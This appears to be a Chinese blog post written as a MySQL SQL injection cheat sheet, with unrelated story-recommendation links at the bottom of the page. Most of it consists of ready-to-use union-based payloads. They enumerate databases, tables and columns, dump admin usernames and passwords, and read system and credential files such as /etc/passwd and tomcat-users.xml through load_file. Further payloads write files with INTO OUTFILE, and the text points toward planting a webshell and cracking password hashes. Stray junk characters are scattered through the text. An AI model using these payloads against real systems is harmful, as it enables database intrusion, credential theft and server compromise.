MYSQL注入語句

一包警、信息查詢 information_schema是MySQL 5.0后產(chǎn)生的虛擬數(shù)據(jù)庫,提供訪問數(shù)據(jù)庫元數(shù)據(jù)的

方式篱瞎,即數(shù)據(jù)的數(shù)據(jù)澄者。比如數(shù)據(jù)庫所有庫名或表名粱挡,列類型嫌套,訪問權(quán)限痹筛。

MYsql 5.X以上版本的注入查詢主要基于information_schem

1.UNION 注入 (聯(lián)合查詢注入) ≥ MySQL 5? ? ? information_schema? (信息數(shù)據(jù)庫)瘟判,其中保存著關(guān)于 MySQL 服務(wù)器所維護(hù)的所有其它數(shù)據(jù)庫的 信息, 如數(shù)據(jù)庫名萧吠、表名左冬、數(shù)據(jù)類型、訪問權(quán)限等纸型。

顯示數(shù)據(jù)庫信息字段數(shù)查找

?id=1/**/Order/**/By/**/10/**/--? ? ? ? 正常則字段數(shù)>10 id=1/**/Order/**/By/**/12/**/--? ? ? ? 錯誤則字段數(shù)<12

枚舉數(shù)據(jù)庫名

?And 1=2 Union Select 1,SCHEMA_NAME from information_schema.SCHEMATA limit 0,1 (注意字段數(shù))

從 0 個庫開始,顯示數(shù)到第 1 個庫

當(dāng)前數(shù)據(jù)庫名 and 1=2 union select 1,database()--

查表名?

and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7068707a72--?

table_schema=后面是庫名的 16 進(jìn)制(上面爆出的庫名轉(zhuǎn)換16進(jìn)制)

查字段名

and 1=2 union select 1,COLUMN_NAME from information_schema.COLUMNS where table_name=0x61646d696e and table_schema=0x7068707a72 limit 1,1--

0x61646d696e? ? 表名 admin?

0x7068707a72? ? 庫名 phpzr(上面爆出的庫名拇砰,表名)

查字段內(nèi)容?

and 1=2 union select 1,concat(id,0x3c62723e,username,0x3c62723e,password) from admin--

從 admin 表中查詢字段名為 id、username狰腌、password 值的記錄(username除破,password都是上一步爆出的字段名)

admin是上面爆出的表名

0x3c62723e 表示<br>

、琼腔、瑰枫、、丹莲、躁垛、剖毯、、教馆、、擂达、土铺、、板鬓、悲敷、、俭令、后德、、抄腔、瓢湃、、赫蛇、绵患、、悟耘、落蝙、

一.查看 MYSQL 基本信息(庫名,版本,用戶)?

and 1=2 union select 1,database(),version(),user()--

關(guān)于找不到 ROOT 密碼的爆破: 通過 LOAD_FILE(’C:\..\MYSQL\DATA\MYSQL\USER.MYD’)得到用戶的 HASH 散列,之后用 CAIN 爆 破….? ? ??

current_user() 當(dāng)前用戶名?

version() ? ??MySQL 數(shù)據(jù)庫版本?

system_user() ? ? ?系統(tǒng)用戶名

?user() ? ? ? ? ?用戶名?

session_user() ? ??連接數(shù)據(jù)庫的用戶名?

database() ? ??數(shù)據(jù)庫名

?load_file() ? ? ? ?MySQL 讀文件(需 root 權(quán)限)?

@@datadir ? ?MySQL 庫文件路徑

@@version_compile_os? ? 操作系統(tǒng)

Substring()函數(shù) substring()是字符串讀取(可解決字段長度限制導(dǎo)致信息顯示不全) id=1/**/And/**/1=2/**/Union/**/Select/**/1,Substring(Load_file(0x633a2f626f6f742e696e69),1)/* */

Replace()函數(shù) Replace()是字符串替換函數(shù),替換指定的字符串內(nèi)容暂幼,返回替換后全部數(shù)據(jù)筏勒。有時通過 load_file() 讀文件內(nèi)容無法正常顯示,例如用 Replace()替換掉其中編碼為 hex 的“<”及“空格”旺嬉。? id=1/**/And/**/1=2/**/Union/**/Select/**/1,replace(load_file(0x2f6574632f706173737764),0x3c,0 x20)/**/

寫入 webshell 一:無法獲得 web 目錄 ① 用 uploadpic.php 中 getimagesize()函數(shù)的小 bug管行,先在后臺添加上傳類型 text/asa,然后到前臺傳 圖片的地方傳個 asa 文件鹰服,這個函數(shù)無法讀取起大小病瞳,暴出錯誤時泄露了絕對路徑

二、入侵?jǐn)?shù)據(jù)庫操作系統(tǒng) 讀寫文件 前置條件?

1:讀文件 load_file()函數(shù)要數(shù)據(jù)庫 root 賬戶權(quán)限.

?2:寫文件 magic_quotes_gpc 必須為 off.

數(shù)據(jù)庫賬戶權(quán)限判斷 And Ord(Mid(User(),1,1))=114? ? ? ? ?

? 正常是 root

①? 讀文件 Hex (Recommend) http://127.0.0.1/web_vunerability/mysql.php?id=1/**/And/**/1=2/**/Union/**/Select/**/1,Replac e(Load_file(0x2f6574632f68747470642f636f6e662f68747470642e636f6e66),0x3c,0x20)/**/

/etc/httpd/conf/httpd.conf? ? ? ? ? ? //Red Hat 0x2f6574632f68747470642f636f6e662f68747470642e636f6e66

c:\windows\system32\inetsrv\MetaBase.xml? ? ? ? //NT 5.2 0x633a5c77696e646f77735c73797374656d33325c696e65747372765c4d657461426173652e786d6c

c:\Program Files\Tomcat\conf\tomcat-users.xml? ? ? //Tomcat For Windows 0x433a5c50726f6772616d2046696c65735c546f6d6361745c636f6e665c746f6d6361742d7573657273 2e786d6c

Char And/**/1=2/**/Union/**/Select/**/1,Load_file(char(99,58,92,98,111,111,116,46,105,110,105))/**/

無編碼 And/**/1=2/**/Union/**/Select/**/1,load_file('c:/boot.ini')/**/

②? 寫文件 and 1=2 union all select 'fuck',2 into outfile 'd:/fuck2.txt'#

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末悲酷,一起剝皮案震驚了整個濱河市套菜,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌设易,老刑警劉巖逗柴,帶你破解...
    沈念sama閱讀 218,451評論 6 506
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異顿肺,居然都是意外死亡戏溺,警方通過查閱死者的電腦和手機(jī)渣蜗,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,172評論 3 394
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來旷祸,“玉大人耕拷,你說我怎么就攤上這事⊥邢恚” “怎么了骚烧?”我有些...
    開封第一講書人閱讀 164,782評論 0 354
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵,是天一觀的道長闰围。 經(jīng)常有香客問我赃绊,道長,這世上最難降的妖魔是什么羡榴? 我笑而不...
    開封第一講書人閱讀 58,709評論 1 294
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任碧查,我火速辦了婚禮,結(jié)果婚禮上校仑,老公的妹妹穿的比我還像新娘忠售。我一直安慰自己,他們只是感情好肤视,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,733評論 6 392
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布档痪。 她就那樣靜靜地躺著,像睡著了一般邢滑。 火紅的嫁衣襯著肌膚如雪腐螟。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,578評論 1 305
  • 城市分裂傳說
    那天困后,我揣著相機(jī)與錄音乐纸,去河邊找鬼。 笑死摇予,一個胖子當(dāng)著我的面吹牛汽绢,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播侧戴,決...
    沈念sama閱讀 40,320評論 3 418
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼宁昭,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了酗宋?” 一聲冷哼從身側(cè)響起积仗,我...
    開封第一講書人閱讀 39,241評論 0 276
  • 萬榮殺人案實(shí)錄
    序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎蜕猫,沒想到半個月后寂曹,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,686評論 1 314
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,878評論 3 336
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年隆圆,在試婚紗的時候發(fā)現(xiàn)自己被綠了漱挚。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 39,992評論 1 348
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡渺氧,死狀恐怖旨涝,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情阶女,我是刑警寧澤颊糜,帶...
    沈念sama閱讀 35,715評論 5 346
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布,位于F島的核電站秃踩,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏业筏。R本人自食惡果不足惜憔杨,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,336評論 3 330
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望蒜胖。 院中可真熱鬧消别,春花似錦、人聲如沸台谢。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,912評論 0 22
  • 一樁弒父案,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽朋沮。三九已至蛇券,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間樊拓,已是汗流浹背纠亚。 一陣腳步聲響...
    開封第一講書人閱讀 33,040評論 1 270
  • 情欲美人皮
    我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留筋夏,地道東北人蒂胞。 一個月前我還...
    沈念sama閱讀 48,173評論 3 370
  • 代替公主和親
    正文 我出身青樓,卻偏偏與公主長得像条篷,于是被迫代替她去往敵國和親骗随。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,947評論 2 355

推薦閱讀更多精彩內(nèi)容